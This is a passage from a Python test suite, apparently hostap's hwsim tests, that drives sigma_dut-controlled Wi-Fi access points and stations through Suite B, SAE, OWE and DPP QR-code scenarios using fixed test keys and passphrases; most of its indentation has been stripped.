"sigma_dut_ap_cipher.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt)
if ap_group:
cmd += ",GroupCipher,%s" % ap_group
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
if sta_cipher_group is None:
sta_cipher_group = sta_cipher
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise=sta_cipher, group=sta_cipher_group,
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_override_rsne(dev, apdev):
"""sigma_dut controlled AP overriding RSNE"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae(dev, apdev, params):
"""sigma_dut controlled AP with SAE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_password(dev, apdev, params):
"""sigma_dut controlled AP with SAE and long password"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_password.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C')
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C',
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_group(dev, apdev, params):
"""sigma_dut controlled AP with SAE and specific group"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_group.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae(dev, apdev, params):
"""sigma_dut controlled AP with PSK+SAE"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[2].request("SET sae_groups ")
dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="0", wait_connect=False)
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="2")
dev[1].connect("test-sae", psk="12345678", scan_freq="2412")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
dev[2].request("DISCONNECT")
if ev is not None:
raise Exception("Unexpected connection without PMF")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe(dev, apdev):
"""sigma_dut controlled OWE station"""
try:
run_sigma_dut_owe(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_owe(dev, apdev):
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = { "ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"ieee80211w": "2",
"rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe(dev, apdev, params):
"""sigma_dut controlled AP with OWE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe.sigma-hostapd")
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ecgroupid(dev, apdev):
"""sigma_dut controlled AP with OWE and ECGroupID"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="21", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="19", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
if dev[1].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode (2)"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode_2.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
            if dev[0].get_status_field('bssid') not in res2:
                raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
            if dev[1].get_status_field('bssid') not in res1:
                raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee(dev, id1):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_qr_resp_1(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 1)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1)
def test_sigma_dut_dpp_qr_resp_2(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 2)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 2)
def test_sigma_dut_dpp_qr_resp_3(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 3)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 3)
def test_sigma_dut_dpp_qr_resp_4(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 4)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 4)
def test_sigma_dut_dpp_qr_resp_5(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 5)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 5)
def test_sigma_dut_dpp_qr_resp_6(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 6)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 6)
def test_sigma_dut_dpp_qr_resp_7(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 7)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 7)
def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev):
"""sigma_dut DPP/QR responder (channel list override)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1',
listen_chan=2)
def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None,
listen_chan=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
if chan_list:
cmd += ",DPPChannelList," + chan_list
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,%d,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % conf_idx
if listen_chan:
cmd += ",DPPListenChannel," + str(listen_chan)
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_default_dir(dev, apdev):
    """sigma_dut DPP/QR (mutual) initiator as Enrollee (default auth direction)"""
    run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
extra="DPPAuthDirection,Mutual,")
def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra=''):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
    except Exception:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, "DPPNET01".encode("hex"), conf_id)
if own_id is not None:
cmd += " own=%d" % own_id
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1')
def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
